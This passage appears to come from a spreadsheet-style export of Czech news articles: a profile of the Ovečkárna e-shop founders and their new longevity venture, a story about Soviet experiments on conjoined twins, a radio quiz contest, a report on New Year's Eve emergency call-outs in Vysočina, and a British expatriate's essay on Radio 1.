v regionu sekal zahrady. „Jednou mi volal, že se stane milionářem, protože bude sekat pro otrokovickou teplárnu a dají mu za to padesát tisíc,“ rozesměje se Lucie Bernátková při vzpomínce na léto 2013. Martin , vybavený starou strunovkou, tehdy získal zakázku na úpravu zarostlého areálu o čtyřiceti tisících čtverečních metrech. „Všem byl pro smích, že to nemůže zvládnout, ale on byl tak odhodlaný, že to nějak dokázal.“ Jak se blížila zima, navlékl zase teplé oblečení, napěchoval dodávku vlněnými produkty a spolu se svou pozdější ženou se rozjel po republice. Znojmo , Valašské Meziříčí , Český Krumlov . Tři vánoční trhy, během nichž prodali zboží za milion korun. A pochopili, že využijí-li možností internetu, nemusí z toho být pouze sezonní záležitost. Tou dobou se definitivně dali dohromady a posilněni o poznatky, co jejich zákazníci chtějí a jak s nimi komunikovat, položili základy Ovečkárny. „Nebudovali jsme firmu, o byznysu jsme neměli vůbec žádné povědomí. Chtěli jsme si jen vydělat na živobytí. Zbytek jsme vráželi zpět do nákupu dalšího zboží a postupně jsme se zvětšovali a posouvali,“ říká Martin . Zpočátku těžili i ze spolupráce s jeho otcem, jenž dodnes provozuje vlastní podobně zaměřený e-shop Ovci-veci.cz. Poměrně brzy se však rozkmotřili, a to natolik, že se dodnes nebaví. Martin s Lucií se vydali vlastní cestou vydlážděnou internetem, která je dovedla na pět evropských trhů – kromě Česka a Slovenska do Maďarska , Rumunska , Německa – a ke stamilionovému obratu. Vedle silného tržního postavení se Ovečkárna mohla pyšnit také portfoliem z přírodních materiálů, jež šlo na ruku moderním spotřebitelům a zahrnovalo rovněž vlastní populární značku Vlnka. Tím ostatně zaujali Babišův Hartenberg, který tou dobou výrazně posiloval svou e-commerce divizi. Nebudovali jsme firmu, o byznysu jsme neměli vůbec žádné povědomí. Chtěli jsme si jen vydělat na živobytí. Na začátku roku 2021 jeho zástupci přijeli na východ Moravy s nabídkou odkupu sedmdesátiprocentního podílu – šedesát procent pro sebe a zbylých deset pro spřízněnou investiční skupinu eRockets , reprezentovanou mimo jiné Jiřím Hlavenkou , která s Hartenbergem vstupovala do více online obchodů. S nabídkou, které se těžko odolávalo. Alespoň Martinovi . „Byli jsme spokojení, měli jsme bydlení, auto, více jsme nepotřebovali, proto jsem vůči zájmu investorů byla vlažná a nestála o ně. Martin ale měl velké oči. Zároveň bývá za svou práci rád uznaný, proto do toho podle mě šel,“ reaguje Lucie. „A ty se divíš? Ještě v roce 2017 jsme neměli skoro nic a najednou o čtyři roky později přijde někdo, kdo nám nabídne devítimístnou částku,“ dává její manžel nahlédnout do svých tehdejších úvah. „Všichni mi ale tehdy říkali, že přijdu o celou firmu,“ připouští. „A taky jsem přišel.“ Uběhlo pár měsíců a Hartenberg do firmy dosadil nového šéfa. Pochopitelně, očekávaně. Jeho představa o fungování Ovečkárny se však od zavedených pořádků výrazně lišila. A tak ze strany Martina Bernátka , jenž měl i přes minoritní podíl nadále velmi silné slovo, padlo rozhodnutí, že buď odejde CEO, nebo on sám. „Mohl jsem de facto cokoli, měl jsem respekt zakladatele, ale věděl jsem, že pokud svým přístupem budu otravovat, zkazím tím práci nás všech,“ vysvětluje, proč nakonec dospěl k prodeji celé společnosti. Počítání nikoli oveček, ale ocenění a uznání, jež jim v průběhu let vlněné produkty přinesly, skončilo velmi rychle. Lítost? Nebyla. Minimálně ji Martin nepřizná a rozproudí tím debatu, do níž by byla škoda jakkoli vstupovat. „Upřímně mi to v tu chvíli bylo docela jedno.“ „Tobě nepřišlo líto, že přicházíme o firmu, kterou jsme vybudovali úplně z ničeho?“ „Ne, bral jsem to jako součást cesty. Jsem vděčný za všechno, co nám Ovečkárna dala, ale byla to jen etapa života, a hlavně geniální deal.“ „Teď je ti to jedno, protože cítíš zápal pro něco nového. Už zase lítáš s telefonem, máš ten stres a nekoukáš se dozadu. To jen my ženské se budeme pořád vracet k tomu, jak jsme se tam radovaly, když jsme balily objednávky, a užívaly si to.“ Foto Tomáš Škoda Pravda je, že prodej Ovečkárny byl bezprecedentním obchodem, který odrážel nejen její rekordní výsledky, ale také postpandemický boom odvětví. Spekuluje se, že firmu, která za rok 2022 utržila 275 milionů korun, když meziročně vyrostla takřka o polovinu, Bernátkovi následující jaro prodali za – v součtu s prvotní investicí – přibližně půl miliardy. To už je pořádná motivace na životní změnu. A také příležitost zabezpečit rodinu. Postavit nový vysněný dům a do garáže zaparkovat naleštěné Porsche 911 GT3 v ikonické barvě Shark Blue. I přes tyhle radosti, někdo by namítl zbytnosti, se však podle svých slov nezměnili. „Rád su přirozený,“ nezapře v sobě původ. „Na nic si nehraju a směju se primitivnímu humoru. Myslím ale, že v tom velkou roli hraje to, že pořád žijeme ve Zlíně , obklopení stejnými lidmi,“ přemítá. „A já bych řekla, že tě peníze mírně změnily,“ oponuje Lucie. „Spíše tě ale ovlivnily v tom, že máš větší sebevědomí, možnost se více rozvíjet a proměňovat příležitosti, které se ti nabízejí.“ Záhy ovšem dodává, že by se její partner dost možná proměnil i bez peněz, neb není typem člověka, jemuž by vyhovovalo stát na místě. I proto mu odpočívat a nekoukat se dopředu po vystoupení z Ovečkárny dlouho nevydrželo. Takřka okamžitě se začal věnovat konzultacím pro ostatní podnikatele v e-commerce, a přestože poptávek měl spoustu, neustále ho svírala touha věnovat se něčemu vlastnímu. Až se letos na jaře zrodila myšlenka na longevity projekt. Pochopil, že jde o trend, na který by díky svým znalostem a zkušenostem mohl být schopen naskočit. „V hlavě se mi spojily dvě věci. Jednak mi téma přišlo přirozené, protože hodně jezdím na kole a naučil jsem se rozumět svému tělu. Zároveň jsem si byl vědom, že ho dokážu zjednodušit, aby si jej vzalo za své mnohem více lidí, než je tomu teď.“ Moc dobře ví, o čem mluví. Jako mladí se ženou „báňali jednu za druhou“. Ještě pár let nazpět měl 120 kil, často se cpal koblihami a kvůli špatné životosprávě přišel o žlučník. „I teď mám své neřesti, podobně jako ostatní, a to je dost možná důvod, proč by nám mohli věřit, protože sice nejsme vystudovaní lékaři, ale máme osobní zkušenost s problémy, s nimiž se denně setkává snad každý,“ líčí. „Ukazuješ lidem to, že jsi zvedl svůj tlustý zadek, vystoupil jsi z komfortní zóny a šel jsi pro sebe něco dělat,“ přitakává Lucie. Dostatečně motivováni a poučeni zkušeností z předchozích let se tak před pár týdny vrhli do utváření dalšího životního byznysu, jehož středobodem bude zákazník a jeho potřeby. Jestliže Martin je tváří, ideovým hybatelem, Lucie jeho vznešené myšlenky udržuje pod střechou a udává jim směr. Půlka rodinného úspěchu jde za ní. Fráze, které však při delším poznávání téhle dvojice věříte. Tvrdí to Martin , když mu to – dle manželky – zrovna dovolí mužské ego. Mnohem více je to ale patrné ve chvíli, kdy ženské polovině Bernátkových dáte prostor o podnikání vyprávět vlastními slovy. Záhy posluchač pochopí, že byla (a je) s firmou srostlá, utvářela její řád. Ať už to bylo v Ovečkárně, nebo nyní v OlaOla. Stavíme druhý domov, prostředí, kde se bude dělat byznys, ale hlavně vládnout pohoda. „Když jsme začínali, měla jsem krátce po maturitě, vysokou jsem dělala dálkově, a tak mi přišlo přirozené Martinovi pomáhat, tím spíš, že mě ta práce bavila. Teď, co jsme manželé, ale ještě silněji pociťuji, že je to i můj projekt,“ přibližuje máma dvou malých dětí. „Stavíme druhý domov, prostředí, kde se bude dělat byznys, ale hlavně vládnout pohoda.“ Odtud ostatně plyne název OlaOla. Zkomolenina španělského pozdravu hola vznikla při dovolené na Mallorce, tedy během období, kdy lidi zpravidla nejvíce zaplavují blažené pocity. Projektů, do nichž Bernátkovi chtějí vkládat své zkušenosti a energii, by navíc v budoucnu mohlo být více. Už zkraje loňského roku založili soukromý investiční fond Entita WTF (What the Fund), do jehož portfolia se postupně zařadil například zprostředkovatel krabičkové diety NutritionPro nebo aplikace propojující křesťanské věřící Believer. „Chceme stát u věcí, které jsou obecně prospěšné pro společnost,“ hlásí Martin . „Rádi bychom, aby projekty, na nichž se podílíme, vedly k tomu, že lidé v naší zemi budou šťastní a budou žít v dobrém zdraví mnohem déle než teď.“ Autor: Robert Sattler Autor Robert Sattler</t>
  </si>
  <si>
    <t>20250101_225_3695235407_bb8368160f3b15e9b687.html</t>
  </si>
  <si>
    <t>bb8368160f3b15e9b687</t>
  </si>
  <si>
    <t>Výjimečným sestrám Sověti zničili život: Siamská dvojčata odebrali matce a nelidsky je mučili</t>
  </si>
  <si>
    <t>Výjimečným sestrám Sověti zničili život: Siamská dvojčata odebrali matce a nelidsky je mučili Nechutné pokusy na lidech, které prováděl nacistický netvor doktor Mengele, jsou všem dobře známé. Zvrhlého bádání a experimentování s lidmi se ale nedopouštěli jen nacisté. Smutný příběh siamských dvojčat Dáši a Máši Krivošljapových (†53) dokazuje, že podobné zvrácenosti se děly i na půdě Sovětského svazu . Sestry Dáša a Máša Krivošljapovy se narodily 3. ledna 1950. Děvčátka byla na první pohled jedinečná, šlo totiž o siamská dvojčata. Holčičky měly společné nohy, jejich těla se spojovala v pase, a každá tak měla vlastní trup. Lékaři s dětmi jednali jako s laboratorními krysami. Dášu a Mášu po porodu matce odebrali s tím, že dcerky zemřely. Takový osud by pro ně byl ale ještě milosrdný. Místo domů k rodičům Máša a Dáša putovaly do rukou vědců, kteří holčičiky důkladně zkoumali. Zjistili, že dvojčata měla společný krevní oběh, nervovou soustavu měla ale Dáša i Máša svou vlastní. Každá dívka tak ovládala jednu nohu. Vědci dívky podrobili řadě nelidských testů. Sověti zkoumali, jak jedna dívka reaguje na mučení druhé, jak snáší hlad, elektrošoky, mráz nebo nedostatek spánku. Máša a Dáša tak od narození zažívaly muka, jaká si málokdo dokáže vůbec představit. Lepších podmínek se děvčata dočkala až v šesti letech, kdy byla přemístěna do ústavu pro tělesně postižené . Veřejnost o jejich existenci dalších osm let neměla tušení. Introvertnější Dáša se v 18 letech pokusila oběsit a později propadla alkoholismu. Máša se sice alkoholu ani nedotkla, protože byla abstinentka, ale kvůli společnému krevnímu oběhu se opíjela také. Máša byla oproti Dáše dominantnější, excentričtější, až maniakální. „Byla psychopat podle všech kritérií,“ řekla v roce 2017 novinářka Juliet Butler, která se s dvojčaty stýkala v 80. letech. Máša byla i tou, která odmítla chirurgické rozdělení. Na rozdíl od Dáši si život bez sestry nedokázala představit. Ženy dožily v domově pro válečné veterány v Moskvě a v dubnu roku 2003 zemřely. Jako první zesnula Máša, Dáša následovala o 17 hodin později. Profimedia.cz Dáša a Máša Krivošljapovy měly těžký osud. Autor: chal Rubrika transition_slide Příběhy</t>
  </si>
  <si>
    <t>20250101_226_3695252326_7e65fa2b45aedf2285a7.html</t>
  </si>
  <si>
    <t>7e65fa2b45aedf2285a7</t>
  </si>
  <si>
    <t>Soutěž: Za 3 správné odpovědi ročníková sada oběžných mincí k výročí vstupu Česka do EU</t>
  </si>
  <si>
    <t>Soutěž: Za 3 správné odpovědi ročníková sada oběžných mincí k výročí vstupu Česka do EU Pokud dnes 8. 1. odpovíte správně na všechny 3 položené otázky, získáte Ročníkovou sadu oběžných mincí Vstup do Evropské unie . Pokud dnes odpovíte správně na všechny 3 položené otázky, pošleme vám tentokrát pěknou mezinárodní Ročníkovou sadu oběžných mincí Vstup do Evropské unie 2020 - 2024 od České mincovny . V roce 2024 uplynulo rovných 20 let od vstupu Česka a Slovenska do Evropské unie . Toto jubileum připomíná mezinárodní sada oběžných mincí, za kterou stojí právě jablonecká Česká mincovna, slovenská Mincovňa Kremnica a centrální banky obou států. Emise, která má podobu dvou sad oběživa ve společném balení, obsahuje všechny platné oběžné mince vydané národními bankami Česka a Slovenska s vyraženým ročníkem 2024. Jedná se o nominální hodnoty 1, 2, 5, 10, 20 a 50 Kč; 1, 2, 5, 10, 20 a 50 c, 1 a 2 €. Doprovázejí je ještě dva tematické pamětní mincovní žetony. Podobné česko-slovenské sady oběživa se objevily v letech 2007 a 2018 – byly rychle vyprodány a dodnes jsou vyhledávaným sběratelským artiklem. Dne 1. května 2004 Evropská unie přijala deset nových členů – převážně postkomunistických zemí, mezi kterými nechyběly Česko a Slovensko . Dosud největší rozšíření unii zásadně změnilo. Objevily se v ní nové konfliktní linie, které zkomplikovaly dosahování konsenzu, ale zároveň se však stala kulturně bohatší a mnohem silnější, s její sjednocenou ekonomikou se může měřit jen málokdo… Jak soutěžíme? Každý všední den ve 12:40 vám po soutěžním příspěvku postupně položíme tři otázky , odpovídat na každou musíte začít do pěti vteřin . Pokud začnete odpovídat později, odpověď je neplatná a hodnotíme ji jako nesprávnou. Kompletní pravidla najdete zde . A co když se jednou spletete? Pokud odpovíte pouze na 2 otázky správně, dnes Vám pošleme sadu gastronomických cen. Bude mezi nimi jednak Aperol Spritz après ski balíček se zimní výbavou na lyže nebo na brusle (obsahuje vak na brusle, šálu, čepici a další dárky). Součástí balíčku je i poukaz na bruslení a na drink v Aperol Spritz baru v OC Metropole Zličín a nechybí ani Aperol a Cinzano To Spritz (pokud nepijete alkohol , vyměníme za nealkoholické Crodino). K tomu Vám přidáme i dárkový set ze sítě pražíren a kaváren Mamacoffee , který obsahuje balení skvělé Sváteční zrnkové kávy a nížinný černý čaj Bio Assam . Heslem Mamacoffee je „káva s příběhem“ a kávu i čaj pečlivě vybírají, nakupují za důstojných podmínek a praží ve vlastních pražírnách. K jakékoliv výhře v dnešní soutěži Vám ještě přidáme i „novoroční bonus“ – pošleme Vám Kalendář pro Světlušku na rok 2025 , který má opět veselou a hravou podobu. Nadační fond ČRo pro něj letos oslovil mladého tvůrce Kristiána aka Mr. Krisse. To je tanečník a vizuální umělec z Prahy , který se tanci a pohybu těla se věnuje již více než 15 let (on sám o sobě prohlašuje, že „tančí s rukou po papíře a kreslí s tělem po podlaze“). Finanční prostředky, které díky prodeji kalendářů Nadační fond utrží, umožní účelně a transparentně přerozdělit nadační podporu ze Sbírky Světluška na podporu nevidomých a slabozrakých. Ani při jedné správné odpovědi neodejdete s prázdnou – pošleme vám cenu útěchy a zároveň překvapení od Radiožurnálu. Autor: Petra Sklenářová Autor person Petra Sklenářová Rubrika transition_slide Informace</t>
  </si>
  <si>
    <t>14900</t>
  </si>
  <si>
    <t>20250101_227_3695209582_d9deb0243ff8a495f2eb.html</t>
  </si>
  <si>
    <t>d9deb0243ff8a495f2eb</t>
  </si>
  <si>
    <t>Poslední den loňského roku na Vysočině vyjeli policisté, hasiči i zdravotníci</t>
  </si>
  <si>
    <t>Poslední den loňského roku na Vysočině vyjeli policisté, hasiči i zdravotníci Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Ad Clicks: Ad Views: Dne 1. 1. 2025 Havlíčkobrodsko , Jihlavsko , Pelhřimovsko , Třebíčsko , Vysočina , Žďársko , Zprávy 164 Zobrazení V době od rána v úterý 31. prosince přijali policisté integrovaného operačního střediska v Jihlavě do rána na Nový rok více než stovku nejrůznějších oznámení o událostech, ke kterým na území kraje došlo. Na řadě míst zasahovali také hasiči a zdravotníci. Pátrali po pohřešovaných osobách, přijímali oznámení o dopravních nehodách, spáchaných přestupcích a trestných činech, nálezu munice či v souvislosti s požárem, řešili situace, do kterých se dostali opilí lidé, konflikty a další události. „Policisté na Třebíčsku pátrali po seniorce, která se nevrátila do svého bydliště. Do hledání se zapojili policisté, včetně psovodů, a to nejen z Vysočiny ale také z Jihomoravského kraje. Po seniorce pátrali rovněž hasiči jak dobrovolní, tak profesionální, dále členové Czech SAR Teamu a skupiny Resdogs . V rámci pátrací akce se podařilo v lese seniorku nalézt hasičům, žena byla v místě členitého a těžko přístupného terénu. Do péče následně seniorku převzala zdravotnická záchranná služba ,“ uvedla policejní mluvčí Jana Kroutilová . Poslední den loňského roku pátrali policisté také po ženě, která v úterý 31. prosince utekla ze zdravotnického zařízení v Havlíčkově Brodě . „Ženu se policistům podařilo nalézt na Chotěbořsku a je v pořádku,“ dodala Jana Kroutilová . Zdravotnická záchranná služba Kraje Vysočina měla během silvestrovských oslav opět plné ruce práce. „Během noční směny z 31. prosince 2024 na 1. ledna 2025 vyjeli záchranáři celkem k 62 případům a ošetřili 59 pacientů. Počet výjezdů byl obdobný jako v loňském roce. V přímé souvislosti s oslavami nového roku evidujeme 23 událostí. Nejčastějšími důvody našich výjezdů byly úrazy, kterých bylo celkem 11. Ve třech případech jsme zasahovali u pacientů po fyzickém napadení. K intoxikaci alkoholem jsme vyjeli šestkrát, přičemž všichni pacienti byli transportováni do zdravotnického zařízení k dalšímu ošetření. Nechyběly ani případy související s nesprávnou manipulací s pyrotechnikou. Tři pacienti byli zraněni, z toho jeden utrpěl poranění horní končetiny a dva poranění v obličeji. Tato zranění si vyžádala okamžitou zdravotnickou pomoc a transport do nemocnice,“ doplnil Petr Janáček, tiskový mluvčí Zdravotnické záchranné služby Kraje Vysočina. Prvním miminkem roku 2025 se v Nemocnici Jihlava stal Matyáš z Velké Bíteše . „Narodil se dnes v 1:37 a váží 3 015 g. Maminka Terezie si naší porodnici vybrala díky doporučení od svojí sestry, která u nás přivedla na svět miminko před půl rokem. Moc děkujeme za důvěru, v roce 2024 si naší porodnici vybralo celkem 1139 maminek. Zhruba 20 % z nich si zvolí jihlavskou porodnici i přesto, že spádově podle bydliště patří jinam. Silvestrovská noc se neobešla bez úrazů. Lékaři ošetřili středně těžký úraz pacienta s popáleným obličejem, který musel být transportován na specializované pracoviště. Dalším silvestrovským úrazem byla vybuchlá petarda v ruce. Oproti tomu na naší Protialkoholní záchytné stanici byl relativně klid. Poslední den v roce ubytovali 4 opilce a v noci přibyl pouze jeden, což je celoroční průměr,“ přiblížila poslední hodiny starého a nového roku Monika Zachrlová, tisková mluvčí Nemocnice Jihlava . Matyáš z Velké Bíteše , foto: Nemocnice Jihlava Hasiči mezi 20.00 a sedmou hodinou ranní zasahovali u osmi událostí, z toho byly ve čtyřech případech požáry. „Po sedmé hodině v podvečer zasahovaly čtyři jednotky hasičů u požáru dvou volně stojících přístřešků na zahradě rodinného domu ve Stojčíně na Pelhřimovsku. Plameny za sebou zanechaly škodu v předběžné výši 400 tisíc korun. Při požáru ani samotném zásahu se nikdo nezranil. Požár zapříčinila nedbalost při ukládání popela. Požáry krabic se zábavní pyrotechnikou likvidovali hasiči v Náměšti nad Oslavou a Jihlavě . Ve Žďáru nad Sázavou zasahovali hasiči před půl jednou v noci u požáru plastového kontejneru. Požár za sebou zanechal škodu deset tisíc korun a zapříčinila jej nedbalost. V jenom případě jsme vyjížděli k planému poplachu, dvakrát jsme pomáhali zdravotníkům s transporty pacientů a o půl třetí ráno jsme byli povoláni k dopravní nehodě osobního vozidla na komunikaci u Pořežína nedaleko Velké Losenice na Žďársku. Při nehodě se zranili dva lidé,“ uvedla Petra Musilová, tisková mluvčí krajských hasičů na Vysočině. Požár kontejneru ve Žďáře nad Sázavou a zábavné pyrotechniky v Jihlavě , foto: HZS Kraje Vysočina Ve srovnání s posledním prosincovým dnem roku 2023 byly ve stejném časovém úseku podle Petry Musilové letošní oslavy klidnější. „V tomto časovém úseku jsme zasahovali u čtrnácti událostí, z tohoto počtu u devíti požárů. Jednalo se o drobné požáry krabic od zábavní pyrotechniky, keřů a košů, které za sebou nezanechaly majetkovou škodu. Dalšími zásahy byly ve třech případech technické pomoci, v jednom případě planý poplach a v jednom případě likvidace úniku oleje z proražené olejové vany osobního vozidla,“ uzavřela Petra Musilová. Úvodní foto: Havárie osobního auta na u Pořežína nedaleko Velké Losenice, foto: HZS Kraje Vysočina Autor: Milan Pilař Autor person Milan Pilař</t>
  </si>
  <si>
    <t>362</t>
  </si>
  <si>
    <t>20250101_228_3695198763_5a7d198cb9929c83da63.html</t>
  </si>
  <si>
    <t>5a7d198cb9929c83da63</t>
  </si>
  <si>
    <t>Proč britský důchodce vysílal na Radiu 1&amp;nbsp;na Štědrý den?</t>
  </si>
  <si>
    <t>Proč britský důchodce vysílal na Radiu 1&amp;nbsp;na Štědrý den? Proč britský důchodce vysílal na Radiu 1 na Štědrý den? Když se mě lidi ptají, co mám na téhle zemi rád, Radio 1 bude součástí mé odpovědi, společně s pivem a hospodskou kulturou. Možná si teď myslíš, že jsem dost divný, ale když vydržíš číst dál, pokusím se ti vysvětlit tuhle love story. Neměl bych být posluchačem Radia 1. Je mi aspoň dvakrát tolik, co průměrnému posluchači. Návštěvníci, kteří mě neznají, jsou vždycky překvapení, když ho slyší hrát v našem obýváku. Když si vyzvedávám auto po servisu, obvykle zjistím, že mi mechanik přeladil rádio na „normálnější“ stanici. Upřímně řečeno, i mně se dost muziky, co hrají, nelíbí. Přesto mi už skoro 30 let zní v uších každý den - a konečně jsem letos na Štědrý den strávil tři hodiny jako spolumoderátor jednoho z pořadů, což pro mě bylo stejně významné, jako když jsem získal české občanství. Byl jsem ve studiu na Štědrý den na pozvání Tomáše Vydry, který je sám dost netypickým moderátorem Radia 1, i když je tam od začátků stanice. Tomáš je teď můj dobrý kamarád; žasnu nad jeho ohromujícími znalostmi rocku a blues (a sbírkou, která s těmi znalostmi souvisí), zatímco on si myslím trochu váží mé jediné výhody - nejenže znám aspoň některé staré rockové kapely, co hraje, ale viděl jsem je živě, ještě za studentských let. Ale roky jsem ho znal jen podle jeho pořadu a pořád jsem si říkal, jak mohl tenhle Čech vůbec slyšet ty kapely, které hrály v době komunistické represe, a co je to za rádio, které vysílá jeho pořad mezi dalšími show pro mladé hipstery? „Radio 1 je ‚rebelská‘ stanice,“ řekl mi nedávno Tomáš, a v té krátké větě jsem našel odpověď na tu otázku a taky lepší pochopení toho, co mě k Radiu 1 tak přitáhlo. Abych to vysvětlil, musím se vrátit do roku 1968. „Proč nemůžeme poslouchat hudbu, kterou máme rádi?“ Bylo mi 14. Hudba byla pro mě a moje kamarády důležitá a žili jsme ve zlatém věku britské populární hudby - paradoxně jsme ale žili v konzervativní zemi, kde se naši rodiče a politici báli „špatného vlivu“ popové hudby. BBC hrála jen málo hudby, kterou jsme chtěli slyšet. Proto vznikly pirátské rozhlasové stanice jako Radio Caroline, které vysílaly z lodí zakotvených v Severním moři (jak to docela věrně zachycuje film „The Boat That Rocked“ ( Piráti na vlnách )). Poslouchal jsem je, co to šlo, dokud mi v tom vláda nezabránila. Rušili signál pirátů. Byl jsem vzteky bez sebe. Nesměl jsem nosit dlouhé vlasy, dalo mi zabrat přesvědčit mámu, aby mi koupila džíny Levis 501, a teď tohle. A pak přišla sovětská invaze do Československa . Náš učitel dějepisu byl tyran, který mlátil některé žáky a děsil nás všechny, ale budu mu navždy vděčný za to, že se specializoval na moderní evropské dějiny. Najednou dokázal propojit historii se současností, takže my v jeho třídě jsme věděli víc než asi 90 % britské populace o tom, co se děje v Československu a proč. BBC se snažila informovat, jak nejlépe uměla. Díval jsem se na záběry mladých Čechů, jak se baví v barech a kavárnách, poslouchají, jak nám říkali, Beatles a Stones , a zakládají vlastní popové kapely, dokud nepřijely tanky a nezačaly rušit signál BBC World Service a Hlasu Ameriky. Cože? Rušit, jako my rušíme Radio Caroline? To bylo na čtrnáctiletého kluka trochu moc. Z hodin dějepisu jsem měl dojem, že komunistické Československo je temné a pochmurné místo, a najednou jsem viděl všechny ty mladé lidi, kteří chtěli to co já: oblékat se, jak chceme, a poslouchat, co chceme. Byl jsem jednoznačně na straně Čechoslováků. Naštěstí i můj táta. Hudbu moc nemusel, ale obdivoval Čechy za to, že se postavili na odpor. Pamatuju si, jak mi vysvětloval symbolický význam slavného hokejového vítězství . Tehdy jsem získal to „rebelské srdce“ a část ho patřila Čechům. Co se týče naší hudby, vláda nakonec nařídila vytvoření BBC Radio 1, aby hrálo popovou hudbu, a přetáhla několik DJů z pirátských lodí, ale moc mě to nenadchlo. Zůstal jsem věrný pirátům, kteří měli tichou podporu holandské vlády - ta jim dovolila kotvit v holandských vodách a zásobovat je z holandských přístavů. Na oplátku piráti hráli hodně holandských kapel - a proto je jedna z mých oblíbených rockových kapel Golden Earring. „ Je to trochu divný… “ Když jsem v roce 1993 přijel do Prahy , poté co převratné změny v Evropě přinesly Čechům svobodu, kterou jsem jim vždycky přál, k Radiu 1 jsem si cestu hned nenašel. Nedokážu vysvětlit proč - byl jsem zvědavý na místní hudební scénu a čeští kolegové mě rychle seznámili s kapelami z „alternativní“ scény jako Tichá dohoda a Garáž. Ale co se týče rádia, upnul jsem se na Radio Metropolis; založili ho Američané v roce 1991, a protože moderátoři mluvili anglicky a hráli známý americký rock, byla to pro mě jistota v tom vzrušujícím, ale hodně cizím prostředí. Po čase mě to ale začalo nudit. Naštěstí jsem v té době potkal slečnu, která je teď mou ženou. Když zhodnotila, proč pořád poslouchám ty americké nesmysly, navrhla Radio 1. „Myslím, že jsem to zkusil,“ odpověděl jsem, „ale bylo to trochu divný.“ „Zkus to znovu,“ trvala na svém, „jsem si jistá, že to je pro tebe.“ Měla pravdu, jako obvykle v tolika věcech. V té době (1995) jsem už měl vlastní firmu a mohl jsem mít rádio puštěné celý den. Postupně jsem začal té „divné“ stanici rozumět. Nebylo snadné zjistit, kteří moderátoři budou hrát hudbu, co se mi líbí, tak jsem poslouchal všechno. Pomalu jsem si začal užívat hudbu, kterou jsem obecně označoval jako „taneční“, aniž bych vlastně tušil, kolik nových žánrů mezitím vzniklo. A co víc, Radio 1 mě seznamovalo s spoustou nové rockové hudby z domova - Oasis , Blur , Pulp, Suede, James; nová hudba „Cool Britannia“ mi zněla v kanceláři díky skromným českým moderátorům, prokládaná těmi nejoriginálnějšími znělkami, jaké jsem kdy kde slyšel. I reklamy v té době pro klienty jako Zapa a AAA Auto byly očividně vyrobené stanicí pro její specifické publikum. Byl jsem chycený. Staré odpoledne je mrtvé… ať žije Staré dopoledne Když jsme začali trávit letní víkendy v domku u Staré Boleslavi , který zdědila moje žena, objevil jsem pořad Tomáše Vydry. Tehdy vysílal v sobotu odpoledne a trval 4 hodiny. Taky jsme zjistili, že má v pátek večer bluesový pořad, a teď mi říká, že tehdy měl i další pořady. I když jsme se s Tomášem nikdy nepotkali, stal jsem se pravidelným posluchačem jeho pořadů, a když Radio 1 začalo některé z nich rušit, probudily se ve mně „aktivistické“ instinkty. Napsal jsem Lence Wienerové, ředitelce stanice prakticky po celou dobu její existence (a proto jedné z hrdinů stanice), a nakonec se ona a Saša Michailidis sešli s mojí ženou a se mnou v hospodě Zvonařka blízko studia. Moc si nepamatuju, co jsme říkali - většinou mluvila moje žena - ale myslím, že je trochu zaskočil náš asertivní přístup a fakt, že zejména moje žena měla lepší profesní přehled o komerčním mediálním prostředí - měla na starosti mediální rozpočet Unileveru . Tomáš vzpomíná, že irská skupina, která už vlastnila Radio Kiss a Radio Beat, nedávno koupila Radio 1, a někdo z té skupiny nařídil Lence a Sašovi, že stanice musí mít „jasnou identitu“, v tomto případě „alternativní“. Tomášova hudba nebyla „alternativní“. Vznikl kompromis, kdy se Tomášův pořad přesunul na dvouhodinový slot v 11 hodin v sobotu. Když to oznámili, Tomáš nás s manželkou v pořadu zmínil - a pak pustil skladbu jedné z mých oblíbených kapel ze studentských let, Wishbone Ash, s názvem „Everybody Needs to Have a Friend“. Zíral jsem na rádio s dojetím; jak mohl Tomáš vědět, že Wishbone Ash, méně známá anglická rocková kapela, je jedna z mých oblíbených? Tomáš má zajímavý životní příběh (rozhovory s ním [ tady ] a tady), ale Radio 1 je plné zajímavých osobností. Je přitom zřejmé, že nechtějí být „hvězdy“ nebo mediální osobnosti; mnoho z nich má jiné významné profesní zájmy. Tomáš byl několik let obchodním ředitelem firmy, která instalovala 4G sportovní hřiště - často na „zajímavých“ místech, třeba v Kábulu ! Jerry Žák , jeden z původních DJů a stále moderátor Hitparády Radia 1, je provozním ředitelem Next Generation Security Solutions (kybernetické bezpečnostní firmy). David Brada , můj kamarád, který léta moderoval týdenní pořad Blue Train, má úspěšnou kariéru v reklamních agenturách. Nejde o hudbu - jde o lidi Ale já mám jen omezenou osobní zkušenost s lidmi z Radia 1. Nekonečně lepší pohled na ně a příběh stanice najdeš v knize „Život v éteru“ od jedné z nejdéle sloužících moderátorek, Jany Kománkové . Je to úžasně živá kniha, částečně i díky bohatství fotografií, které text doprovázejí. Pokud si Radia 1 vážíš jako něčeho víc než jen zvukové kulisy, užiješ si každou stránku. Už před přečtením té knihy jsem došel k závěru, že Radio 1 je mezi rozhlasovými stanicemi na světě jedinečné. Věř mi, hledal jsem podobnou všude možně; dneska ti aplikace jako Radio Garden může pomoct najít stanici v každém koutu světa podle „žánru“. Ale brzy zjistíš, že to nestačí. Aby se stanice mohla rovnat Radiu 1, musí mít moderátory, kteří chtějí být součástí osobnosti stanice a respektují její historii. Začátkem roku 2022 jsem na Radio Garden hledal rockové a bluesové stanice a narazil jsem na jednu z Kyjeva . Hudba byla dobrá. Ale chtěl jsem slyšet hlas, hlas z Kyjeva , vzdorující, který promlouvá ke světu, říká nám, že hrají dál, možná hledá naši morální podporu. Žádný hlas tam nebyl. Byla to, jako tolik dnešních rádií, plně automatizovaná stanice. Radio 1 porušuje všechna pravidla moderního rádia. Všichni DJové hrají, co chtějí, a říkají, co chtějí (v mezích daných licencí). Rozsah nabízené hudby se vzpírá kategorizaci. Jsou tu i mluvené pořady. Znělky jsou naprosto úžasné ; zatímco většina znělek tě po pár posleších začne štvát, tyhle tě rozesmějí stejně jako když se poprvé objevily, často před 30 lety. Samozřejmě, rádio samo je údajně věc minulosti. Píseň „Radio Gaga“ od Queen oplakávala jeho nevyhnutelný zánik v rukách televize, zejména MTV . No jo, jenže to vydali před necelými 41 lety. Když jsem zmínil, o kolik jsem starší než cílová skupina Radia 1, žena se mě zeptala, jestli mladí vůbec ještě poslouchají rádio. Ha! Ukazuje se, že „Staré poledne“ má velmi stabilní publikum a že místo aby bylo jen pro staré rockery jako já, má významné publikum i v nejmladší věkové skupině. Jsou to asi ti samí kids, co kupují vintage kazeťáky - kdo by to byl čekal? Hodně lidí 